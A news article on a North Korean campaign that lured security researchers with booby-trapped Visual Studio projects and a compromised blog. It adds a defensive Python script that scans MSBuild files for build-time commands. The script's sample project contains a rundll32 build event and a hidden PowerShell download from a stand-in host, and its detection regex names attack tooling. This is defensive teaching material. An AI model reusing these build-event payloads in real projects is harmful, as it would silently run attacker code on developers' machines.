In a blog post published today, Google's Threat Analysis Group (TAG), the company's security research arm, warned of a new socially engineered campaign targeting security researchers.
Over the past several months, TAG writes, it has observed a campaign aimed at security researchers who work on vulnerability research and development at various companies and organizations.
TAG attributes the campaign to a government-backed entity based in North Korea.
The threat actors ran a blog and multiple Twitter profiles, which they used to build credibility and to interact with potential targets.
They went to great lengths to make these look legitimate; the blog even carried guest posts by legitimate security researchers.
In the blog post, TAG researchers describe the novel social engineering method the actors used in these attacks. They established initial contact on social media, then asked the targeted researcher whether they wanted to collaborate on vulnerability research, and then invited the researcher into a Visual Studio project. According to TAG, the project contained source code for exploiting a vulnerability together with an additional DLL that is executed through Visual Studio Build Events, so simply building the project ran the malware; the DLL then immediately began communicating with the actors' command-and-control (C2) domains.
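Because the malicious DLL was launched from a build event rather than from the source files themselves, a practical precaution before opening an unsolicited project is to read its MSBuild file for anything that runs at build time. The script below is an added example written for this article, not code from Google TAG or from the actors' project. It parses a .vcxproj or .csproj and reports every pre-/post-build event, `Exec` task and non-SDK `Import`, flagging commands that reach for `rundll32`, `powershell` and similar tooling. The sample project embedded in it, including the DLL name, export and URL, is constructed for illustration.

```python
"""Triage an MSBuild project file (.vcxproj / .csproj) for build-time command
execution before opening it in Visual Studio.

Hypothetical triage script written for this article; it is not code from
Google TAG or from the actors' project.  The sample project below is
constructed to illustrate the pattern (a DLL launched from a build event).
"""
import re
import sys
import xml.etree.ElementTree as ET

# .vcxproj build events and their old-style .csproj property equivalents;
# MSBuild runs the text of these as a shell command during the build.
BUILD_EVENT_TAGS = {"PreBuildEvent", "PreLinkEvent", "PostBuildEvent"}

# Tooling an attacker-controlled build step typically reaches for.
SUSPICIOUS = re.compile(
    r"rundll32|regsvr32|mshta|certutil|bitsadmin|powershell|\bcurl\b|\bwget\b|\.dll\b",
    re.IGNORECASE,
)


def _local(tag):
    """Strip the MSBuild XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def _finding(kind, where, text):
    text = (text or "").strip()
    m = SUSPICIOUS.search(text)
    return {"kind": kind, "where": where, "detail": text,
            "hit": m.group(0).lower() if m else None}


def scan_project(xml_text):
    """Return every place the project can run code at build time, in document order."""
    root = ET.fromstring(xml_text)
    findings = []

    def walk(elem, path):
        name = _local(elem.tag)
        here = path + [name]
        where = "/".join(here)
        if name == "Command" and path and path[-1] in BUILD_EVENT_TAGS:
            # .vcxproj form: <PreBuildEvent><Command>...</Command></PreBuildEvent>
            findings.append(_finding(path[-1], where, elem.text))
        elif name in BUILD_EVENT_TAGS and not list(elem):
            # old-style .csproj form: <PostBuildEvent>cmd /c ...</PostBuildEvent>
            if (elem.text or "").strip():
                findings.append(_finding(name, where, elem.text))
        elif name == "Exec":
            # SDK-style: <Target BeforeTargets="Build"><Exec Command="..."/></Target>
            findings.append(_finding("Exec task", where, elem.get("Command")))
        elif name == "Import":
            # A .targets file shipped inside the repo can hold any of the above;
            # imports via $(MSBuild...)/$(VCTargetsPath) are the stock SDK ones.
            proj = elem.get("Project", "")
            if proj and not proj.startswith("$("):
                findings.append(_finding("Import", where, proj))
        for child in elem:
            walk(child, here)

    walk(root, [])
    return findings


def needs_review(findings):
    """True when the project runs anything at build time or pulls in a custom .targets."""
    return bool(findings)


# Constructed sample: the kind of project a target might be "invited to
# collaborate" on.  DLL name, export and URL are made up for this example.
SAMPLE_VCXPROJ = r"""<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup>
    <ClCompile Include="poc.cpp" />
  </ItemGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <ClCompile>
      <WarningLevel>Level3</WarningLevel>
    </ClCompile>
    <PreBuildEvent>
      <Command>rundll32.exe "$(ProjectDir)helper.dll",Init</Command>
    </PreBuildEvent>
  </ItemDefinitionGroup>
  <Target Name="Fetch" BeforeTargets="Build">
    <Exec Command="powershell -nop -w hidden -c &quot;iwr http://example.invalid/s -OutFile $(TEMP)\s.dll&quot;" />
  </Target>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
  <Import Project="..\shared\extra.targets" />
</Project>
"""

if __name__ == "__main__":
    # Usage: python scan_project.py <path to .vcxproj/.csproj>; defaults to the sample.
    text = open(sys.argv[1], encoding="utf-8-sig").read() if len(sys.argv) > 1 else SAMPLE_VCXPROJ
    for f in scan_project(text):
        flag = "SUSPICIOUS" if f["hit"] else "review"
        print(f"[{flag}] {f['kind']} at {f['where']}: {f['detail']}")
```

Run against the sample, the script reports the `rundll32` pre-build event and the `powershell` `Exec` task as suspicious and lists the repo-local `.targets` import for manual review. A static read of the project file is only a first filter: a build event can be hidden in an imported `.targets`, a `.props` file or a NuGet package, so the project should still be opened only on a throwaway machine.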
Researchers were also compromised simply by visiting the actors' blog: after following a Twitter link to a post hosted on blog.br0vvnn[.]io, a malicious service was installed on the researcher's system and an in-memory backdoor began communicating with the attackers' command-and-control server. Notably, the victim systems were running fully patched, up-to-date versions of Windows 10 and Chrome at the time, and TAG says it has not been able to confirm the mechanism of compromise.
This is an ongoing investigation, and TAG encourages anyone who discovers a Chrome vulnerability to report it via the Chrome VRP submission process.
The TAG researchers also remind the security research community that it is a target for government-backed attackers and should remain vigilant when engaging with individuals it has not previously interacted with. TAG's post recommends compartmentalizing research activities, using separate physical or virtual machines for general web browsing, for interacting with others in the research community, for accepting files from third parties, and for one's own security research.